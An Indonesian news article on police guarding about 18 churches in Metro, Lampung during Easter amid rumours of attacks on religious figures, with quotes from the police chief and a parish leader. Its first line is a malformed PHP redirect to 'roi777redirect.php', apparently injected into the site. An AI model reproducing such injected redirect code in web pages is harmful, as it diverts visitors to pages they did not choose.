header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Kapolres Pastikan Paskah Aman -
Kapolres Pastikan Paskah Aman

Isu Penyerangan Tokoh Agama

TRANSLAMPUNG.COM, METRO – Isu-isu penyerangan tokoh agama yang beredar di masyarakat melalui media sosial menjadi sorotan pihak kepolisian. Menanggapi isu tersebut terutama di saat hari besar keagamaan pengamanan tempat-tempat ibadah diprioritaskan oleh pihak kepolisian.

Seperti halnya Kepolisian Resort (Polres) Kota Metro yang membentuk pengamanan pada gereja-gereja di Kota Metro yang melakukan ibadah Paskah tahun ini.

Sebanyak kurang lebih 18 gereja di Kota Metro dijaga ketat oleh satuan pengamanan dari Polres Kota Metro. Dari data yang dihimpun sebanyak kurang lebih 100 personil dari beberapa satuan diterjunkan untuk menjaga jalanya ibadah paskah tersebut.

“Kami melaksanakan PAM gereja ingin memastikan kegiatan mereka aman lancar dan tertib. Ini beberapa gereja di seluruh Metro ada 18  gereja pengamanan sekitar 100an pasukan,” ujar AKBP Umi Fadhilah Astutik Kapolres Metro saat dimintai keterangan, Sabtu (31/3).

Menurut Umi memang perayaan seluruh Indonesia wajib di amankan.

“Apalagi kemaren kan ada isu-isu penyerangan tokoh agama. Kami berusaha membuat mereka nyaman untuk melakukan ibadahnya itu,” kata Umi.

Terpisah, Michael Suyono Ketua Dewan Pastoral Paroki (DPP) Gereja Khatolik Hati Kudus Metro mengatakan, kegiatan ibadah paskah berjalan dengan aman.

Ibadah malam paskah di Gereja Hati Kudus Metro dilakukan dengan dua gelombang yang pertama dimulai dari pukul 18.00 WIB sampai pukul 21.00 WIB dan kemudian pukul 22.00 WIB sampai pukul 01.00 WIB.

“Ibadah ini memperingati peristiwa kebangkitan tuhan yesus kristus, besok pagi hari paskahnya hari kebangkitan tuhan Yesus Kristus. Jamaah kurang lebih 2500 sampai 3000,” kata Michael.

Michael mengatakan jamaah sangat ramai karena banyak keluarga juga yang di luar daerah sedang mudik.

“Seperti anak saya yang dari Jakarta pulang kesini jadi ramai,” imbuhnya.

Menurut dia ada beberapa prosesi ibadah yang dilakukan pada malam paskah.

“Yang pertama penyalaan api unggun, untuk menyalakan lilin paskah, kemudian lilin paskah diarak ke dalam, kemudian misa kudus dimulai dengan sembilan bacaan kitab suci, kemudian kutbah, abis kutbah penerimaan tubuh darah kristus, abis itu menutup pengumuman,” katanya.

Sebelumnya ibadah paskah diawali dengan Kamis Putih, Jumat Agung, Sabtu Sepi, Malam Paskah dan kemudian hari Minggu tepatnya perayaan paskah. (suf/hkw)

 

 

 

News Reporter